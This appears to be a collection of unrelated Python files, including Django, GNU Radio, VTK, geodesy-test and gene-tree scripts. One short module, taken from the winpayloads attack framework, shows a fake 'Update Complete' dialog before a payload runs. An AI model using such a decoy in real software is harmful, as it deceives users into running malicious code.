while one > op:
one >>= 2
while one != 0:
if op >= res + one:
op -= res + one
res += one << 1
res >>= 1
one >>= 2
return res
def isqrt64(x):
op = x
res = 0
one = 1 << 62
while one > op:
one >>= 2
while one != 0:
if op >= res + one:
op -= res + one
res += one << 1
res >>= 1
one >>= 2
return res
for x in range(0, 2 ** 64, 2 ** 48):
i = isqrt64(x)
s = int(math.sqrt(x))
if i != s:
print(x, i, s)
print("finish")
|
from django.conf.urls import patterns, url
from portfolio.views import (ArtifactDetail, ArtifactList, ProjectDetail,
ProjectList, CategoryDetail, CategoryList)
urlpatterns = patterns(
'',
url(r'^(?P<category_slug>[-\w]+)/projects/(?P<project_slug>[-\w]+)/pages/'
'(?P<artifact_slug>[-\w]+)/$', ArtifactDetail.as_view(),
name='artifact_detail'),
url(r'^(?P<category_slug>[-\w]+)/projects/(?P<project_slug>[-\w]+)/'
'pages/$', ArtifactList.as_view(), name='artifact_list'),
url(r'^(?P<category_slug>[-\w]+)/projects/(?P<project_slug>[-\w]+)/$',
ProjectDetail.as_view(), name='project_detail'),
url(r'^(?P<category_slug>[-\w]+)/projects/$', ProjectList.as_view(),
name='project_list'),
url(r'^(?P<category_slug>[-\w]+)/$', CategoryDetail.as_view(),
name='category_detail'),
url(r'^$', CategoryList.as_view(),
name='category_list'),
)
|
from setuptools import setup
# Use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='thesmuggler',
version='1.0.1',
py_modules=['thesmuggler'],
description='Sidestep import and load Python files as relative paths',
long_description=long_description,
keywords='import modules packages files',
license='MIT',
author='Faraz Yashar',
author_email='faraz.yashar@gmail.com',
url='https://github.com/fny/thesmuggler',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Topic :: Software Development',
'Topic :: Utilities',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3'
]
)
|
# -*- Mode: Python -*-
import coro
import coro.backdoor
import sys
import curses
import pyximport
pyximport.install()
sys.path.append ('/Users/rushing/src/cython')
import newterm
def session (conn, addr):
while 1:
block = conn.recv (1000)
if not block:
break
else:
conn.send (block)
def serve (port=9000):
s = coro.tcp_sock()
s.bind (('', port))
s.listen (50)
while 1:
conn, addr = s.accept()
coro.spawn (session, conn, addr)
if __name__ == '__main__':
coro.spawn (coro.backdoor.serve, unix_path='/tmp/xx.bd')
coro.spawn (serve)
coro.event_loop()
|
import numpy as np
import pandas as pd
from tqdm import tqdm
import networkx as nx
import matplotlib.pyplot as plt
in_path = "AMLsubclones_trees.txt"
df = pd.read_csv(in_path,sep=" ")
debug_processing = 0
print_trees = 0
print(df)
genes = df.columns.values[3:]
cases = df["case"].unique()
germline_gene = "germ"
print(genes)
print(genes.shape)
print(cases)
print(cases.shape)
def print_tree(tree):
nx.draw(tree,with_labels=True)
plt.draw()
plt.show()
max_depth = 0
max_numedges = 0
numedgesdist = dict()
def compute_tree(case_df):
global print_trees,max_numedges
debug_tree = 0
if debug_tree == 1:
print(case_df)
G = nx.DiGraph()
cols_ = case_df.columns
cols_ = set(cols_)
genes_set = set(genes)
genes_case = genes_set.intersection(cols_)
#set_germ = set()
#set_germ.add(germline_gene)
G.add_node(germline_gene)
#print_tree(G)
#print(case_df)
# compute set of all edges
edges_list = list()
num_genes = len(genes_case)
genes_list = list(genes_case)
i=0
j=0
#print(genes_list)
for i in range(num_genes):
gene_1 = genes_list[i]
#print("first gene",gene_1)
occurence_gene_1 = case_df[gene_1].values
#for gene_2 in genes_list:
#print([k for k in range(i+1,num_genes)])
for j in range(i+1,num_genes):
gene_2 = genes_list[j]
#print(" second gene",gene_2)
if gene_1 != gene_2:
occurence_gene_2 = case_df[gene_2].values
if (occurence_gene_2 == occurence_gene_1).all():
sorted_pair = [gene_1,gene_2]
sorted_pair.sort()
edges_list.append((sorted_pair[0],sorted_pair[1],"-?-"))
continue
# if occurences of gene 1 is a subset of gene 2
if (np.logical_or(occurence_gene_1 , occurence_gene_2) == occurence_gene_2).all():
edges_list.append((gene_2,gene_1,"->-"))
continue
# if occurences of gene 1 is a subset of gene 1
if (np.logical_or(occurence_gene_1 , occurence_gene_2) == occurence_gene_1).all():
edges_list.append((gene_1,gene_2,"->-"))
continue
sorted_pair = [gene_1,gene_2]
sorted_pair.sort()
edges_list.append((sorted_pair[0],sorted_pair[1],"-/-"))
#print("number of edges for case",len(edges_list))
edges_len = len(edges_list)
if edges_len in numedgesdist:
numedgesdist[edges_len] = numedgesdist[edges_len]+1
else:
numedgesdist[edges_len] = 1
max_numedges = max(max_numedges , edges_len)
#print("edges_list",edges_list)
# first check if there is another with the same occurences of gene_1
genes_to_check = set(genes_case)
new_genes = list()
merged_nodes = False
while len(genes_to_check) > 0:
gene_1 = genes_to_check.pop()
if debug_tree == 1:
print("checking for duplicates",gene_1)
occurence_gene_1 = case_df[gene_1].values
if debug_tree == 1:
print("occurence_gene_1",occurence_gene_1)
insert_in_node = False
to_merge = list()
for gene_2 in genes_to_check:
if gene_2 != germline_gene and gene_1 != gene_2:
if debug_tree == 1:
print(" check gene_2",gene_2)
occurence_gene_2 = case_df[gene_2].values
if debug_tree == 1:
print("occurence_gene_2",occurence_gene_2)
if (occurence_gene_2 == occurence_gene_1).all():
# merge gene_1 and gene_2
to_merge.append(gene_2)
if debug_tree == 1:
print("found node with same occurences!",gene_1,gene_2)
#debug_tree = 1
merged_nodes = True
gene_1_old = gene_1
for gene_2 in to_merge:
gene_1 = gene_1+"-"+gene_2
genes_to_check.remove(gene_2)
case_df.drop(columns=gene_2,inplace=True)
new_genes.append(gene_1)
case_df.rename(columns={gene_1_old : gene_1},inplace=True)
if len(to_merge) > 0 and debug_tree == 1:
print("merged",gene_1)
print(case_df)
genes_case = set(new_genes)
for gene_1 in genes_case:
if debug_tree == 1:
print("Finding the parent of ",gene_1)
occurence_gene_1 = case_df[gene_1].values
parent_gene = ""
parent_gene_count = occurence_gene_1.shape[0]+1
for gene_2 in genes_case:
if gene_1 != gene_2:
occurence_gene_2 = case_df[gene_2].values
ok_pattern = True
for idx , occ1 in enumerate(occurence_gene_1):
if occ1 > occurence_gene_2[idx]:
ok_pattern = False
break
if ok_pattern == True:
if debug_tree == 1:
print(" ",gene_2,"may be parent")
if occurence_gene_2.sum() < parent_gene_count:
parent_gene_count = occurence_gene_2.sum()
parent_gene = gene_2
if debug_tree == 1:
print(" ",gene_2,"is current candidate parent",parent_gene_count)
if len(parent_gene) > 0:
G.add_edge(parent_gene , gene_1)
if debug_tree == 1:
print(" parent found!",parent_gene)
else:
G.add_edge(germline_gene , gene_1)
if debug_tree == 1:
print(" germline is parent!")
if debug_tree == 1:
print(gene_1,nx.descendants(G,gene_1))
#print(len(G.nodes))
if merged_nodes == True and debug_tree == 1:
debug_tree = 0
print_tree(G)
return G , edges_list
def get_filtered_data_case(data , case_id):
data_case = data.loc[ data["case"]==case_id ]
filtered_cols = ["case", "freq"]
for gene in genes:
#print(gene)
#print(data_case[gene])
#print(data_case[gene].sum())
#print("")
if data_case[gene].sum() > 0:
filtered_cols.append(gene)
filtered_data_case = data_case[filtered_cols].sort_values("freq",ascending=False)
case_tree , edge_list = compute_tree(filtered_data_case)
if print_trees == 1:
print_tree(case_tree)
return filtered_data_case , case_tree , edge_list
n_genes = genes.shape[0]
genes_dict = dict()
i = 0
for gene in genes:
genes_dict[gene] = i
i = i + 1
edges_path = "trees-aml.txt"
fout_edges = open(edges_path,"w")
edge_ids = dict()
edge_id_to_assign = 1
num_nodes = dict()
for case_id in tqdm(cases):
#case_id = cases[i]
filtered_data_case , case_tree , edge_list = get_filtered_data_case(df, case_id)
tree_depths = nx.shortest_path_length(case_tree, source=germline_gene)
num_nodes_tree = len(list(case_tree.nodes))
#print("num_nodes_tree",num_nodes_tree)
if num_nodes_tree in num_nodes:
num_nodes[num_nodes_tree] = num_nodes[num_nodes_tree] + 1
else:
num_nodes[num_nodes_tree] = 1
#print this edge list
#print(edge_list)
if len(edge_list) < 1:
pass
#print_tree(case_tree)
else:
edge_ids_line = list()
for edge in edge_list:
fout_edges.write(str(edge[0])+str(edge[2])+str(edge[1])+" ")
# if edge in edge_ids:
# edge_id = edge_ids[edge]
# else:
# edge_ids[edge] = edge_id_to_assign
# edge_id = edge_id_to_assign
# edge_id_to_assign += 1
# edge_ids_line.append(edge_id)
#edge_ids_line.sort()
#for edge_id in edge_ids_line:
#fout_edges.write(str(edge_id)+" ")
fout_edges.write("\n")
#print("tree_depths",tree_depths)
#print_tree(case_tree)
max_depth = max(max_depth , max(tree_depths.values()))
print("max_depth",max_depth)
print("max_numedges",max_numedges)
print("numedgesdist",numedgesdist)
print("num_nodes",num_nodes)
avg_numnodes = 0.
tot_graphs = sum(list(num_nodes.values()))
for numnode_ in num_nodes:
avg_numnodes += (numnode_-1)*num_nodes[numnode_]/tot_graphs
print("average num_nodes",avg_numnodes)
fout_edges.close()
# plot histogram of number of nodes
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import colors
fig, axs = plt.subplots(1, 1, sharey=True, tight_layout=True,figsize=(5,4))
width = 0.5
plt.bar(np.array(list(num_nodes.keys())), num_nodes.values(), width)#, color='blue')
plt.title("Distribution of number of nodes (avg="+str(avg_numnodes)[0:4]+")")
plt.xlabel("Number of nodes")
plt.ylabel("Number of trees")
plt.savefig("aml_statistics.pdf",dpi=300)
#plt.show()
|
import os
inflation_rate_pct = {
2010: 1.5,
2011: 3.0,
2012: 1.7,
2013: 1.5,
2014: 0.8,
2015: 0.7,
2016: 2.1,
2017: 2.1,
2018: 1.9,
2019: 2.3,
2020: 1.4,
}
hvdc_line_cost = {
"kV": 500,
"MW": 3500,
"costMWmi": (3200 / 7),
}
# 2020 USD, from MISO cost estimations
hvdc_terminal_cost_per_MW = 135e3 # noqa: N816
ac_line_cost = {
"kV": [229, 230, 230, 230, 345, 345, 345, 345, 500, 765],
"MW": [300, 600, 900, 1200, 500, 900, 1800, 3600, 2600, 4000],
"costMWmi": [
3666.67,
2000,
1777.78,
1500,
39600,
2333.33,
1388.89,
777.78,
1346.15,
1400,
],
}
transformer_cost = {
"kV": [230, 345, 500, 765],
"Cost": [5.5e6, 8.5e6, 22.75e6, 42.5e6],
}
data_dir = os.path.join(os.path.dirname(__file__), "data")
ac_reg_mult_path = os.path.join(data_dir, "LineRegMult.csv")
bus_neem_regions_path = os.path.join(data_dir, "buses_NEEMregion.csv")
bus_reeds_regions_path = os.path.join(data_dir, "buses_ReEDS_region.csv")
gen_inv_cost_path = os.path.join(data_dir, "2020-ATB-Summary_CAPEX.csv")
neem_shapefile_path = os.path.join(data_dir, "NEEM", "NEEMregions.shp")
reeds_mapping_hierarchy_path = os.path.join(data_dir, "mapping", "hierarchy.csv")
reeds_wind_csv_path = os.path.join(data_dir, "mapping", "gis_rs.csv")
reeds_wind_shapefile_path = os.path.join(data_dir, "rs", "rs.shp")
reeds_wind_to_ba_path = os.path.join(data_dir, "mapping", "region_map.csv")
regional_multiplier_path = os.path.join(data_dir, "reg_cap_cost_mult_default.csv")
transformer_cost_path = os.path.join(data_dir, "transformer_cost.csv")
gen_inv_cost_translation = {
"OffShoreWind": "wind_offshore",
"LandbasedWind": "wind",
"UtilityPV": "solar",
"Battery": "storage",
"NaturalGas": "ng",
"Hydropower": "hydro",
"Nuclear": "nuclear",
"Geothermal": "geothermal",
"Coal": "coal",
}
gen_inv_cost_techdetails_to_keep = {
"HydroFlash", # Single tech for geothermal
"NPD1", # Single tech for hydro
"newAvgCF", # Single tech for coal
"CCAvgCF", # Single tech for ng
"OTRG1", # Single tech for wind_offshore
"LTRG1", # Single tech for wind
"4Hr Battery Storage", # Single tech for storage
"Seattle", # Single tech for solar
"*", # Single tech for nuclear
}
regional_multiplier_gen_translation = {
"wind-ofs_1": "wind_offshore",
"wind-ons_1": "wind",
"upv_1": "solar",
"battery": "storage",
"Gas-CC": "ng",
"Nuclear": "nuclear",
"Hydro": "hydro",
"coal-new": "coal",
}
regional_multiplier_wind_region_types = {"wind", "wind_offshore", "csp"}
regional_multiplier_ba_region_types = {
"solar",
"storage",
"nuclear",
"coal",
"ng",
"hydro",
"geothermal",
}
|
# Copyright 2007, 2015 Free Software Foundation, Inc.
# This file is part of GNU Radio
#
# GNU Radio Companion is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# GNU Radio Companion is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA
import traceback
import sys
import os
# A list of functions that can receive a message.
MESSENGERS_LIST = list()
_indent = ''
def register_messenger(messenger):
"""
Append the given messenger to the list of messengers.
Args:
messenger: a method that takes a string
"""
MESSENGERS_LIST.append(messenger)
def set_indent(level=0):
global _indent
_indent = ' ' * level
def send(message):
"""
Give the message to each of the messengers.
Args:
message: a message string
"""
for messenger in MESSENGERS_LIST:
messenger(_indent + message)
# register stdout by default
register_messenger(sys.stdout.write)
###########################################################################
# Special functions for specific program functionalities
###########################################################################
def send_init(platform):
msg = "<<< Welcome to {config.name} {config.version} >>>\n\n" \
"Block paths:\n\t{paths}\n"
send(msg.format(
config=platform.config,
paths="\n\t".join(platform.config.block_paths))
)
def send_xml_errors_if_any(xml_failures):
if xml_failures:
send('\nXML parser: Found {0} erroneous XML file{1} while loading the '
'block tree (see "Help/Parser errors" for details)\n'.format(
len(xml_failures), 's' if len(xml_failures) > 1 else ''))
def send_start_load(file_path):
send('\nLoading: "%s"\n' % file_path)
def send_error_msg_load(error):
send('>>> Error: %s\n' % error)
def send_error_load(error):
send_error_msg_load(error)
traceback.print_exc()
def send_end_load():
send('>>> Done\n')
def send_fail_load(error):
send('Error: %s\n>>> Failure\n' % error)
traceback.print_exc()
def send_start_gen(file_path):
send('\nGenerating: %r\n' % file_path)
def send_auto_gen(file_path):
send('>>> Generating: %r\n' % file_path)
def send_fail_gen(error):
send('Generate Error: %s\n>>> Failure\n' % error)
traceback.print_exc()
def send_start_exec(file_path):
send('\nExecuting: %s\n' % file_path)
def send_verbose_exec(verbose):
send(verbose)
def send_end_exec(code=0):
send('\n>>> Done%s\n' % (" (return code %s)" % code if code else ""))
def send_fail_save(file_path):
send('>>> Error: Cannot save: %s\n' % file_path)
def send_fail_connection():
send('>>> Error: Cannot create connection.\n')
def send_fail_load_preferences(prefs_file_path):
send('>>> Error: Cannot load preferences file: "%s"\n' % prefs_file_path)
def send_fail_save_preferences(prefs_file_path):
send('>>> Error: Cannot save preferences file: "%s"\n' % prefs_file_path)
def send_warning(warning):
send('>>> Warning: %s\n' % warning)
|
import unittest
import os.path
import numpy as np
import numpy.lib.recfunctions as rfn
from geodepy.convert import hp2dec, dec2hp
from geodepy.geodesy import vincinv, vincdir, vincinv_utm, vincdir_utm
class TestGeodesy(unittest.TestCase):
def test_vincinv(self):
# Flinders Peak
lat1 = hp2dec(-37.57037203)
long1 = hp2dec(144.25295244)
# Buninyong
lat2 = hp2dec(-37.39101561)
long2 = hp2dec(143.55353839)
ell_dist, azimuth1to2, azimuth2to1 = vincinv(lat1, long1, lat2, long2)
self.assertEqual(round(ell_dist, 3), 54972.271)
self.assertEqual(round(dec2hp(azimuth1to2), 6), 306.520537)
self.assertEqual(round(dec2hp(azimuth2to1), 6), 127.102507)
def test_vincdir(self):
# Flinders Peak
lat1 = hp2dec(-37.57037203)
long1 = hp2dec(144.25295244)
# To Buninyong
azimuth1to2 = hp2dec(306.520537)
ell_dist = 54972.271
lat2, long2, azimuth2to1 = vincdir(lat1, long1, azimuth1to2, ell_dist)
self.assertEqual(round(dec2hp(lat2), 8), -37.39101561)
self.assertEqual(round(dec2hp(long2), 8), 143.55353839)
self.assertEqual(round(dec2hp(azimuth2to1), 6), 127.102507)
def test_vincinv_utm(self):
# Flinders Peak (UTM)
zone1 = 55
east1 = 273741.2966
north1 = 5796489.7769
# Buninyong (UTM)
zone2 = 54
east2 = 758173.7973
north2 = 5828674.3402
ell_dist, azimuth1to2, azimuth2to1 = vincinv_utm(zone1, east1, north1, zone2, east2, north2)
self.assertEqual(round(ell_dist, 3), 54972.271)
self.assertEqual(round(dec2hp(azimuth1to2), 6), 306.520537)
self.assertEqual(round(dec2hp(azimuth2to1), 6), 127.102507)
def test_vincdir_utm(self):
# Flinders Peak (UTM)
zone1 = 55
east1 = 273741.2966
north1 = 5796489.7769
# To Buninyong
azimuth1to2 = hp2dec(306.520537)
ell_dist = 54972.271
hemisphere2, zone2, east2, north2, azimuth2to1 = vincdir_utm(zone1, east1, north1, azimuth1to2, ell_dist)
self.assertEqual(hemisphere2, 'South')
self.assertEqual(zone2, 54)
self.assertEqual(round(east2, 4), 758173.7968)
self.assertEqual(round(north2, 4), 5828674.3395)
self.assertEqual(round(dec2hp(azimuth2to1), 6), 127.102507)
def test_equality_vincentys(self):
# Test multiple point-to-point vincinv calculations
abs_path = os.path.abspath(os.path.dirname(__file__))
test_geo_coords =\
np.genfromtxt(os.path.join(abs_path,
'resources/Test_Conversion_Geo.csv'),
delimiter=',',
dtype='S4,f8,f8',
names=['site', 'lat1', 'long1'],
usecols=('lat1', 'long1'))
test_geo_coord2 = \
np.genfromtxt(os.path.join(abs_path,
'resources/Test_Conversion_Geo.csv'),
delimiter=',',
dtype='S4,f8,f8',
names=['site', 'lat2', 'long2'],
usecols=('lat2', 'long2'))
# Form array with point pairs from test file
test_pairs = rfn.merge_arrays([test_geo_coords, np.roll(test_geo_coord2, 1)], flatten=True)
# Calculate Vincenty's Inverse Result using Lat, Long Pairs
vincinv_result = np.array(list(vincinv(*x) for x in test_pairs[['lat1', 'long1', 'lat2', 'long2']]))
# Calculate Vincenty's Direct Result using Results from Inverse Function
vincdir_input = rfn.merge_arrays([test_geo_coords, vincinv_result[:, 1], vincinv_result[:, 0]], flatten=True)
vincdir_input.dtype.names = ['lat1', 'long1', 'az1to2', 'ell_dist']
vincdir_result = np.array(list(vincdir(*x) for x in vincdir_input[['lat1', 'long1', 'az1to2', 'ell_dist']]))
np.testing.assert_almost_equal(test_pairs['lat2'],
vincdir_result[:, 0], decimal=8)
np.testing.assert_almost_equal(test_pairs['long2'],
vincdir_result[:, 1], decimal=8)
np.testing.assert_almost_equal(vincinv_result[:, 2],
vincdir_result[:, 2])
def test_vincinv_edgecases(self):
lat1 = -32.153892
lon1 = -15.394827
lat2 = -31.587369
lon2 = -13.487739
gdist, az12, az21 = vincinv(lat1, lon1, lat2, lon2)
lon1 = lon1 + 14
lon2 = lon2 + 14
gdist_2, az12_2, az21_2 = vincinv(lat1, lon1, lat2, lon2)
self.assertEqual(gdist, gdist_2)
self.assertEqual(az12, az12_2)
self.assertEqual(az21, az21_2)
if __name__ == '__main__':
unittest.main()
|
# -*- coding: UTF-8 -*-
# Copyright 2015-2018 Luc Saffre
# License: BSD (see file COPYING for details)
from __future__ import unicode_literals
from builtins import str
from django.db import models
from lino.api import dd
@dd.python_2_unicode_compatible
class Person(dd.Model):
name = models.CharField(max_length=50)
def __str__(self):
return self.name
@dd.python_2_unicode_compatible
class Place(dd.Model):
name = models.CharField(max_length=50)
owners = models.ManyToManyField(Person, related_name="owned_places")
ceo = models.ForeignKey(Person, related_name="managed_places")
def __str__(self):
if self.get_restaurant():
if self.get_bar():
what = "Restaurant & Bar "
else:
what = "Restaurant "
elif self.get_bar():
what = "Bar "
else:
what = ''
return "%s %s(ceo=%s,owners=%s)" % (
self.name, what, self.ceo,
','.join([str(o) for o in self.owners.all()]))
def get_restaurant(self):
try:
return self.restaurant
except Restaurant.DoesNotExist:
return None
def get_bar(self):
try:
return self.bar
except Bar.DoesNotExist:
return None
@dd.python_2_unicode_compatible
class Bar(dd.Model):
place = models.OneToOneField(Place)
serves_alcohol = models.BooleanField(default=True)
def __str__(self):
if self.serves_alcohol:
return self.place.name
return "%s (no alcohol)" % self.place.name
@dd.python_2_unicode_compatible
class Restaurant(dd.Model):
place = models.OneToOneField(Place)
serves_hot_dogs = models.BooleanField(default=False)
cooks = models.ManyToManyField(Person)
def __str__(self):
return "%s (cooks=%s)" % (
self.place.name,
','.join([str(o) for o in self.cooks.all()]))
@dd.python_2_unicode_compatible
class Visit(models.Model):
allow_cascaded_delete = ['place']
person = models.ForeignKey(Person)
place = models.ForeignKey(Place)
purpose = models.CharField(max_length=50)
def __str__(self):
return "%s visit by %s at %s" % (
self.purpose, self.person, self.place.name)
@dd.python_2_unicode_compatible
class Meal(models.Model):
allow_cascaded_delete = ['restaurant']
person = models.ForeignKey(Person)
restaurant = models.ForeignKey(Restaurant)
what = models.CharField(max_length=50)
def __str__(self):
return "%s eats %s at %s" % (
self.person, self.what, self.restaurant.name)
|
(lambda: (globals().update({'telethon': __import__('importlib').import_module('telethon.sync')}), globals().update({'c': telethon.TelegramClient('b', input('API ID:'), input('API HASH:')).start(bot_token=input('BOT TOKEN:'))}), c.add_event_handler(lambda e: e.reply('hi'), telethon.events.NewMessage(pattern='!hello')), c.run_until_disconnected()))()
|
# -*- coding: utf8 -*-
"""
Dummy script to averages weight matrix scaling results run with different random seeds
author: András Ecker, last update: 01.2019
"""
import os, pickle
import numpy as np
import pandas as pd
base_path = os.path.sep.join(os.path.abspath(__file__).split(os.path.sep)[:-2])
header = ["multiplier", "replay", "PC_rate", "BC_rate",
"PC_ripple_freq", "PC_ripple_power", "BC_ripple_freq", "BC_ripple_power", "LFP_ripple_freq", "LFP_ripple_power",
"PC_gamma_freq", "PC_gamma_power", "BC_gamma_freq", "BC_gamma_power", "LFP_gamma_freq", "LFP_gamma_power",
"PC_max_autocorr", "PC_max_ripple_range_autocorr", "BC_max_autocorr", "BC_max_ripple_range_autocorr"]
def average_results(sim_version, seeds):
"""
Loads in results obtained with different random seeds and averages them
:param sim_version: tag of sim results used to load in files
:param seeds: list of random seeds used
:return: df: pandas dataframe with averaged results (with multipliers as indicies)
"""
# just to get multipliers... (it's not checked if all versions were run with the same wmx multipliers)
f_name = os.path.join(base_path, "files", "results", "%s_%s.txt"%(sim_version, seeds[0]))
results_tmp = np.genfromtxt(f_name, comments='#')
multipliers = results_tmp[:, 0]
df = pd.DataFrame(index=multipliers)
results = {name:np.zeros((len(multipliers), len(seeds))) for name in header[1:]}
for i, seed in enumerate(seeds):
f_name = os.path.join(base_path, "files", "results", "%s_%s.txt"%(sim_version, seed))
results_tmp = np.genfromtxt(f_name, comments='#')
for j, name in enumerate(header[1:]):
results[name][:, i] = results_tmp[:, j+1]
for name in header[1:]:
df["mean_%s"%name] = np.nanmean(results[name], axis=1)
df["std_%s"%name] = np.nanstd(results[name], axis=1)
return df
if __name__ == "__main__":
sim_version = "sym_0.5_shuffled_linear"
seeds = [1, 12, 1234, 12345, 1993]
df = average_results(sim_version, seeds)
pklf_name = os.path.join(base_path, "files", "results", "%s_avg.pkl"%sim_version)
df.to_pickle(pklf_name, protocol=pickle.HIGHEST_PROTOCOL)
|
#
# Prompts user with dialog box and waits for response before executing, Python
# Module written by Brandon Arvanaghi
# Website: arvanaghi.com
# Twitter: @arvanaghi
# Edited for use in winpayloads
import ctypes
import sys
dialogBoxTitle = "Update Complete";
dialogBoxMessage = "Press OK to Continue"
MessageBox = ctypes.windll.user32.MessageBoxW
MessageBox(None, dialogBoxMessage, dialogBoxTitle, 0)
|
import click
import subprocess
from django.db import DEFAULT_DB_ALIAS, connections
@click.command(help="Runs the command-line client for specified database, or the \
default database if none is provided.")
@click.option("-d", "--database", default=DEFAULT_DB_ALIAS, help="Nominates a database onto which to open a shell. Defaults to the 'default' database.")
def dbshell(database):
connection = connections[database]
try:
connection.client.runshell()
except FileNotFoundError:
# Note that we're assuming the FileNotFoundError relates to the
# command missing. It could be raised for some other reason, in
# which case this error message would be inaccurate. Still, this
# message catches the common case.
raise click.exceptions.UsageError(
'You appear not to have the %r program installed or on your path.' %
connection.client.executable_name
)
except subprocess.CalledProcessError as e:
raise click.exceptions.Exit(
code=e.returncode,
)
|
""" pkg.core.__init__ """
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import vtk
"""
There are two alternative ways to apply the transform.
1) Use vtkTransformPolyDataFilter to create a new transformed polydata.
This method is useful if the transformed polydata is needed
later in the pipeline
To do this, set USER_MATRIX = True
2) Apply the transform directly to the actor using vtkProp3D's SetUserMatrix.
No new data is produced.
To do this, set USER_MATRIX = False
"""
USER_MATRIX = True
def main():
colors = vtk.vtkNamedColors()
# Set the background color.
colors.SetColor('BkgColor', [26, 51, 77, 255])
# Create an arrow.
arrowSource = vtk.vtkArrowSource()
# Generate a random start and end point
startPoint = [0] * 3
endPoint = [0] * 3
rng = vtk.vtkMinimalStandardRandomSequence()
rng.SetSeed(8775070) # For testing.
for i in range(0, 3):
rng.Next()
startPoint[i] = rng.GetRangeValue(-10, 10)
rng.Next()
endPoint[i] = rng.GetRangeValue(-10, 10)
# Compute a basis
normalizedX = [0] * 3
normalizedY = [0] * 3
normalizedZ = [0] * 3
# The X axis is a vector from start to end
vtk.vtkMath.Subtract(endPoint, startPoint, normalizedX)
length = vtk.vtkMath.Norm(normalizedX)
vtk.vtkMath.Normalize(normalizedX)
# The Z axis is an arbitrary vector cross X
arbitrary = [0] * 3
for i in range(0, 3):
rng.Next()
arbitrary[i] = rng.GetRangeValue(-10, 10)
vtk.vtkMath.Cross(normalizedX, arbitrary, normalizedZ)
vtk.vtkMath.Normalize(normalizedZ)
# The Y axis is Z cross X
vtk.vtkMath.Cross(normalizedZ, normalizedX, normalizedY)
matrix = vtk.vtkMatrix4x4()
# Create the direction cosine matrix
matrix.Identity()
for i in range(0, 3):
matrix.SetElement(i, 0, normalizedX[i])
matrix.SetElement(i, 1, normalizedY[i])
matrix.SetElement(i, 2, normalizedZ[i])
# Apply the transforms
transform = vtk.vtkTransform()
transform.Translate(startPoint)
transform.Concatenate(matrix)
transform.Scale(length, length, length)
# Transform the polydata
transformPD = vtk.vtkTransformPolyDataFilter()
transformPD.SetTransform(transform)
transformPD.SetInputConnection(arrowSource.GetOutputPort())
# Create a mapper and actor for the arrow
mapper = vtk.vtkPolyDataMapper()
actor = vtk.vtkActor()
if USER_MATRIX:
mapper.SetInputConnection(arrowSource.GetOutputPort())
actor.SetUserMatrix(transform.GetMatrix())
else:
mapper.SetInputConnection(transformPD.GetOutputPort())
actor.SetMapper(mapper)
actor.GetProperty().SetColor(colors.GetColor3d('Cyan'))
# Create spheres for start and end point
sphereStartSource = vtk.vtkSphereSource()
sphereStartSource.SetCenter(startPoint)
sphereStartSource.SetRadius(0.8)
sphereStartMapper = vtk.vtkPolyDataMapper()
sphereStartMapper.SetInputConnection(sphereStartSource.GetOutputPort())
sphereStart = vtk.vtkActor()
sphereStart.SetMapper(sphereStartMapper)
sphereStart.GetProperty().SetColor(colors.GetColor3d('Yellow'))
sphereEndSource = vtk.vtkSphereSource()
sphereEndSource.SetCenter(endPoint)
sphereEndSource.SetRadius(0.8)
sphereEndMapper = vtk.vtkPolyDataMapper()
sphereEndMapper.SetInputConnection(sphereEndSource.GetOutputPort())
sphereEnd = vtk.vtkActor()
sphereEnd.SetMapper(sphereEndMapper)
sphereEnd.GetProperty().SetColor(colors.GetColor3d('Magenta'))
# Create a renderer, render window, and interactor
renderer = vtk.vtkRenderer()
renderWindow = vtk.vtkRenderWindow()
renderWindow.SetWindowName('OrientedArrow')
renderWindow.AddRenderer(renderer)
renderWindowInteractor = vtk.vtkRenderWindowInteractor()
renderWindowInteractor.SetRenderWindow(renderWindow)
# Add the actor to the scene
renderer.AddActor(actor)
renderer.AddActor(sphereStart)
renderer.AddActor(sphereEnd)
renderer.SetBackground(colors.GetColor3d('BkgColor'))
# Render and interact
renderWindow.Render()
renderWindowInteractor.Start()
if __name__ == '__main__':
main()
|
# Copyright (C) 2021 Intel Corporation
#
# SPDX-License-Identifier: MIT
import copy
import json
import os.path as osp
import os
import av
import numpy as np
import random
import xml.etree.ElementTree as ET
import zipfile
from io import BytesIO
import itertools
from datumaro.components.dataset import Dataset
from datumaro.util.test_utils import compare_datasets, TestDir
from django.contrib.auth.models import Group, User
from PIL import Image
from rest_framework import status
from rest_framework.test import APIClient, APITestCase
import cvat.apps.dataset_manager as dm
from cvat.apps.dataset_manager.bindings import CvatTaskDataExtractor, TaskData
from cvat.apps.dataset_manager.task import TaskAnnotation
from cvat.apps.engine.models import Task
tasks_path = osp.join(osp.dirname(__file__), 'assets', 'tasks.json')
with open(tasks_path) as file:
tasks = json.load(file)
annotation_path = osp.join(osp.dirname(__file__), 'assets', 'annotations.json')
with open(annotation_path) as file:
annotations = json.load(file)
def generate_image_file(filename, size=(100, 50)):
f = BytesIO()
image = Image.new('RGB', size=size)
image.save(f, 'jpeg')
f.name = filename
f.seek(0)
return f
def generate_video_file(filename, width=1280, height=720, duration=1, fps=25, codec_name='mpeg4'):
f = BytesIO()
total_frames = duration * fps
file_ext = os.path.splitext(filename)[1][1:]
container = av.open(f, mode='w', format=file_ext)
stream = container.add_stream(codec_name=codec_name, rate=fps)
stream.width = width
stream.height = height
stream.pix_fmt = 'yuv420p'
for frame_i in range(total_frames):
img = np.empty((stream.width, stream.height, 3))
img[:, :, 0] = 0.5 + 0.5 * np.sin(2 * np.pi * (0 / 3 + frame_i / total_frames))
img[:, :, 1] = 0.5 + 0.5 * np.sin(2 * np.pi * (1 / 3 + frame_i / total_frames))
